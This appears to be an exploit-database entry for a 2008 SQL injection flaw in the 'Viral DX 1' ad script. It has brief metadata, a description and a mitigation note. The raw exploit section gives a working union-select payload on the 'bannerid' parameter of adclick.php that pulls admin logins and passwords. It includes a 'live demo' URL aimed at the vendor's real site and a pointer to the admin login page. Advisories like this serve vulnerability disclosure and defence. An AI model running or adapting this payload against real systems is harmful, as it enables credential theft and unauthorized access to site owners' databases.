Viral DX 1 SQL Injection Vulnerability

vendor:

Viral DX 1

by:

Hussin X

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Viral DX 1

Affected Version From: Viral DX 1

Affected Version To: Viral DX 1

Patch Exists: YES

Related CWE: N/A

CPE: a:e-topbiz:viraldx1

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Viral DX 1 SQL Injection Vulnerability

An attacker can exploit this vulnerability by sending a crafted HTTP request to the vulnerable application. The crafted request contains malicious SQL query which can be used to extract sensitive information from the database. The vulnerable parameter is the ‘bannerid’ parameter which is not properly sanitized before being used in a SQL query.

Mitigation:

Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in SQL queries.

Source

Exploit-DB raw data:

#########################################################
#
#   Viral DX 1  SQL Injection Vulnerability
#========================================================
#
#    Author: Hussin X                                   
#                                                       
#    Home :  www.tryag.cc/cc                            
#                                                     
#    email:  darkangel_g85[at]Yahoo[DoT]com            
#            hussin.x[at]hotmail[DoT]com                
#                                               
#========================================================
#    HomE script : http://e-topbiz.com/
#     
#    Demo : http://e-topbiz.com/trafficdemos/viraldx1/  
#    
#
##########################################################

Exploit:   

http://www.site.com/Script/adclick.php?bannerid=-1+union+select+concat_ws

(0x3a,login,pass)+from+pass--



L!VE DEMO:

http://e-topbiz.com/trafficdemos/viraldx1/adclick.php?bannerid=-

1+union+select+concat_ws(0x3a,login,pass)+from+pass--


LoGiN :

/admin/login.php

 
################################################################################
####################################( Greetz )##################################
#                                                                              #
#      tryag / Mr.IraQ / DeViL iRaQ / IRAQ DiveR/ IRAQ_JAGUAR /str0ke          #      
#                 Silic0n  / Rafi / FAHD / Iraqihack                           #      
#                                                                              #
#################################(and All IRAQIs)###############################

# milw0rm.com [2008-06-24]